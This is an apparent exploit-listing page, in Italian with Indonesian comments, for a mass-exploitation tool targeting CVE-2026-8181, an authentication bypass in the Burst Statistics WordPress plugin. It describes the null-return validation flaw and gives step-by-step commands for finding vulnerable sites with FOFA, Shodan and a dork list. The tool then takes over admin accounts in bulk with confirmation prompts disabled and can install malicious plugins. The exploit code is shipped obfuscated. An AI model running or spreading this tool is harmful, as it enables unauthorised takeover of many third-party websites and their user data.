## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HUDZAIFAHARRANTISI-CVE-2026-8181
# CVE-2026-8181 - Burst Statistics Authentication Bypass
**CVSS 9.8 (Critical)** — Authentication Bypass to Admin Account Takeover
## Descrizione
CVE-2026-8181 è una vulnerabilità di **Bypass di Autenticazione** nel plugin WordPress **Burst Statistics** versione **3.4.0 fino a 3.4.1.1**. Questo plugin è utilizzato da **200.000+ siti WordPress** come alternativa privacy-friendly a Google Analytics per le analisi.
Questa vulnerabilità consente a un **attaccante senza autenticazione** che conosce il **nome utente admin** di:
* Ottenere la **Application Password** admin in 1 richiesta HTTP
* Eseguire una **Acquisizione Completa dell'Account Amministratore**
* Creare un nuovo account admin
* Accedere a tutti i dati del sito (inclusi WooCommerce, dati utente, ecc.)
* Installare plugin dannosi / RCE
### Causa Tecnica
La funzione `is_mainwp_authenticated()` in `class-mainwp-proxy.php` sbaglia nella validazione del valore di ritorno di `wp_authenticate_application_password()`. Questa funzione restituisce `null` (non `WP_Error`) quando viene chiamata al di fuori del contesto REST API, e il codice controlla solo `is_wp_error()`. Poiché `null` non è un `WP_Error`, l'autenticazione viene considerata riuscita.
## Caratteristiche dello Strumento
* **GUI Moderna** — Tema scuro, layout compatto, 3 schede (Scan, Exploit, Log)
* **Scanner di Massa** — Cerca target tramite FOFA API, Shodan API o file list
* **Exploit Automatico** — Exploit di massa con multi-threading
* **Modalità CLI** — Può funzionare senza GUI per automazione
## Requisiti
* **Python 3.11** (obbligatorio — i file .pyd sono compilati per Python 3.11)
* Windows 10/11
## Installazione e Utilizzo
root@kitploit:~
# 1. Clone repository
git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
cd CVE-2026-8181
# 2. Install dependencies
py -3.11 -m pip install -r requirements.txt
# 3. Siapkan .env (untuk scan via FOFA / Shodan)
echo some-email@example.com > .env
echo FOFA_KEY=your_fofa_key >> .env
echo SHODAN_KEY=your_shodan_key >> .env
# 4. Jalankan (pilih salah satu):
# Modern GUI (recommended)
py -3.11 gui_modern.py
# Atau double-click run.bat
run.bat
# Atau CLI langsung exploit satu target
py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm
# Atau exploit massal dari file
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
# Atau scan target dulu, baru exploit
py -3.11 finder.py --file list.txt
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
## Tutorial Passo dopo Passo
### Passo 1: Avvia lo Strumento
Fai doppio clic su `run.bat` o esegui:
root@kitploit:~
py -3.11 gui_modern.py

_Vista della GUI moderna di CVE-2026-8181 con 3 schede_
### Passo 2: Scansiona Target e Exploit
Nella scheda **Scan** : scegli la fonte del target (FOFA/Shodan da .env, file o manuale) → clicca su **SCAN TARGETS**. Nella scheda **Exploit** : inserisci il nome utente admin → clicca su **EXPLOIT**

_Lo strumento trova target vulnerabili e pronti per l'exploit_
### Passo 3: Accesso all'Admin WordPress
Se l'exploit ha successo, l'attaccante ottiene accesso completo come amministratore:

_Dashboard amministratore WordPress dopo un exploitation riuscito_
## File Structure
root@kitploit:~
CVE-2026-8181/
├── CVE-2026-8181.py # Main exploit engine (PyArmor)
├── gui_modern.py # Modern GUI wrapper (recommended)
├── finder.py # Target scanner (FOFA / Shodan / File)
├── run.bat # One-click launcher
├── requirements.txt # Python dependencies
├── .env # API keys (gitignored)
├── .gitignore
├── Dork.txt # Google Dork
├── pyarmor_runtime_000000/ # PyArmor runtime (Python 3.11)
├── system/ # Source modules (obfuscated)
└── img/ # Screenshots tutorial
├── 1.png
├── 2.png
└── 3.png
## Come Ottenere la Chiave API
### FOFA (fofa.info)
1. Registrati su https://fofa.info
2. Accedi → https://fofa.info/userInfo
3. Copia Email e Chiave API → inseriscile in `.env`
### Shodan (shodan.io)
1. Registrati su https://account.shodan.io/register
2. Accedi → https://account.shodan.io
3. Copia Chiave API → inseriscila in `.env`
## Opzioni CLI (CVE-2026-8181.py)
## Disclaimer
**Solo per scopi educativi e penetration testing autorizzato.** L'uso senza autorizzazione su sistemi che non sono di tua proprietà è illegale. Utilizza solo su siti che possiedi o per i quali hai autorizzazione scritta.